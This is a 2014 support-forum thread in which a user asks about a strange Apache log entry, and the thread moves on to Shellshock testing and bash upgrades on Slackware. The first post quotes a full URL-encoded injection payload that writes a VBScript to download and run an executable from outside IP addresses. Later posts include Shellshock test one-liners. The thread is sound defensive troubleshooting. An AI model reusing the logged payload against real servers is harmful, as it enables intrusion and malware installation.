Log inUsernamePassword
Log me on automatically each visit    
Register
Register
Log in to check your private messages
Log in to check your private messages
SMS Forum Index » SMS User Support

Post new topic   Reply to topic
Strange log in apache
View previous topic :: View next topic  
Author Message
Lars
Senior Member


Joined: 25 Oct 2010
Posts: 136

PostPosted: Thu Sep 25, 2014 9:05 pm    Post subject: Strange log in apache Reply with quote

Hi,
today I noticed the strangest log note in /var/log/httpd/access_log:
Code:
"GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222.vbs.} HTTP/1.1" 200 2363


To me it seems like a hack attempt? What worries is that Apache seems to have handled it as a legitimate request? -In part it doesn't seem to be harmful in my SMS-server that is not built on M$-software, but I'm not certain..

I found some searchresults like http://security.stackexchange.com/questions/68035/is-this-new-hack-attempt-something-to-worry-about and that call it an injection attack, but I couldn't validate the replies.

Have you seen anything similar? Or know what it is?

Regards
Lars

140926: Some additional information:
Also found this link: http://forums.iis.net/t/1217448.aspx?Interesting+exploit+attempt+
related to Microsoft IIS server.
A whois on the request address gave: It came from China, the IP:s in the command came somewhat confusingly from Hong Kong and USA, Portugal, Paris.
A nmap on the request IP gave: All 1000 scanned ports on 122.228.207.244 are filtered
Tried to check what processes are running, but they are quite a few and I cannot say which of them normally were running? -I could not identify anything especially suspicious though.
Finally I checked that no new files had been created (on the other hand the request ended with: "DeleteFile...."

The links I found all were from after 20th september this year.

-Sent a question to my ISP and my DNS-service that also runs a Web hotel: None of them had seen anything similar and knew what the request adressed? Both suggested me to contact this forum.
Back to top
View user's profile Send private message
Lars
Senior Member


Joined: 25 Oct 2010
Posts: 136

PostPosted: Fri Sep 26, 2014 8:26 pm    Post subject: Reply with quote

Could it perhaps be the 'ShellShock' Bash Vulnerability CVE-2014-6271 described for instance here:
http://www.digitaltrends.com/computing/check-youre-affected-shellshock-bash-bug-linux-os-x/ ?
Back to top
View user's profile Send private message
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

PostPosted: Fri Sep 26, 2014 8:33 pm    Post subject: Reply with quote

I doubt it, as the script tries to run .exe and .vbs which are windows executables, and most likely the vulnerability doesn't exist anyway in our web server...
Didn't have time to examine the thread though, but I don't see it as serious...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com


Last edited by gerasimos_h on Sat Sep 27, 2014 10:23 am; edited 1 time in total
Back to top
View user's profile Send private message Visit poster's website
Lars
Senior Member


Joined: 25 Oct 2010
Posts: 136

PostPosted: Sat Sep 27, 2014 9:21 am    Post subject: Reply with quote

Thank you gerasimos!!

Lars
Back to top
View user's profile Send private message
Lars
Senior Member


Joined: 25 Oct 2010
Posts: 136

PostPosted: Sat Sep 27, 2014 11:48 am    Post subject: Reply with quote

An additional comment:
I agree with you about the Windows typical commands, that was also my first thoughts, but I wasn't sure Embarassed.

But since a friend posted me about the linux/MacOS bash bug I ran the tests described in the link above against my server:
http://shellshock.brandonpotter.com/
http://www.shellshocktest.com/
http://bashsmash.ccsir.org/
and found that my SMS-1.6.0 server probably isn't vulnerable to the linux bash bug.

Bash however in SMS-1.6.0 (Slackware13.37) seems to be vulnerable to the bash bug, tested with
Code:
$ env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
$ env X="() { :;} ; echo busted" `which bash` -c "echo completed"
$ env x='() { :;}; echo vulnerable' bash -c 'echo hello'


However I never use SMS-1.6.0 as internet client though.

I also tried bash in my ordinary Slackware 14.0, and it also seems vulnerable to the bash bug.

Regards and Thank you for your comment!

Lars
Back to top
View user's profile Send private message
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

PostPosted: Sat Sep 27, 2014 2:23 pm    Post subject: Reply with quote

All bash version are vulnerable so you need to update package from SMS-Current or Slackware patches...

Nevertheless SMS and generally slackware servers ain't vulnerable since no shell access is granted to services, neither to user nobody...
It's a shellshock so you need shell access....
So if you don't have a web or any other application that is too "dirty", you don't have problems...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Back to top
View user's profile Send private message Visit poster's website
Lars
Senior Member


Joined: 25 Oct 2010
Posts: 136

PostPosted: Sat Sep 27, 2014 6:17 pm    Post subject: Reply with quote

Thank you again gerasimos for lookin in to it!

I'll update my bash!

Regards
Lars
Back to top
View user's profile Send private message
Lars
Senior Member


Joined: 25 Oct 2010
Posts: 136

PostPosted: Sun Sep 28, 2014 7:55 pm    Post subject: Reply with quote

A final question after unrigging my vessel
Will the bash-4.3.025-i486-2.txz from SMS-Current be compatible with the 13.37 software in S*M*S-1.6.0?
As you say and some searching revealed (f.i. https://zinetik.com/fix-bash-failure-step-step/), there is still no bug free version.
Perhaps I should wait till there is one?

Regards
Lars
Back to top
View user's profile Send private message
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

PostPosted: Mon Sep 29, 2014 12:30 am    Post subject: Reply with quote

Yes it will be compatible, you can always check it on yout virtuabox first.. Wink

Also from slackware-current, available in SMS too...

Code:
a/bash-4.3.026-i486-1.txz:  Upgraded.
  This is essentially a rebuild as the preliminary patch for CVE-2014-7169
  has been accepted by upstream and is now signed.  This also bumps the
  patchlevel, making it easy to tell this is the fixed version.
  Possibly more changes to come, given the ongoing discussions on oss-sec.


gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Back to top
View user's profile Send private message Visit poster's website
Lars
Senior Member


Joined: 25 Oct 2010
Posts: 136

PostPosted: Mon Sep 29, 2014 10:47 am    Post subject: Reply with quote

Of course gerasimos, I've got my *.ova Smile !

Was a bit tired when I wrote yesterday night.

I'll deal with it after the dry dockings next weekend!

Many thanks again!

Lars
Back to top
View user's profile Send private message
Lars
Senior Member


Joined: 25 Oct 2010
Posts: 136

PostPosted: Thu Oct 02, 2014 11:34 am    Post subject: Reply with quote

Excuse me for one more question concerning the bash update:
In the meantime I read the two other forum threads
http://sms.it-ccs.com/forum/viewtopic.php?t=895
http://sms.it-ccs.com/forum/viewtopic.php?t=893
and found the Slackware.com updates

Since I've got SMS-1.6.0 based on Slackware 13.37, would it not be enough upgrading bash with
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bash-4.1.014-i486-1_slack13.37.txz (updated frequently)
instead of using the SMS-Slackware Current: bash-4.3.027-i486-1.txz ?

The latter seems a bit like a "sledge-hammer approach" to me Smile

Regards

Lars
Back to top
View user's profile Send private message
gerasimos_h
Site Admin


Joined: 09 Aug 2007
Posts: 1757
Location: Greece

PostPosted: Fri Oct 03, 2014 6:39 am    Post subject: Reply with quote

Sure no problem, patches applied to those packages as well... Smile

For what is worth, I upgrade recently a slackware-11 installation with bash from slackware-13...

gerasimos_h

_________________
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Back to top
View user's profile Send private message Visit poster's website
Lars
Senior Member


Joined: 25 Oct 2010
Posts: 136

PostPosted: Fri Oct 03, 2014 11:07 am    Post subject: Reply with quote

Quote:
For what is worth, I upgrade recently a slackware-11 installation with bash from slackware-13...

Of course it's worth something for me who's not so advanced or experienced Smile !

Thank you gerasimos!

Lars
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    SMS Forum Index » SMS User Support All times are GMT + 2 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum

SMS - Superb! Mini Server Project © 2016
Powered by phpBB © 2001, 2002 phpBB Group
iCGstation v1.0 Template By Ray © 2003, 2004 iOptional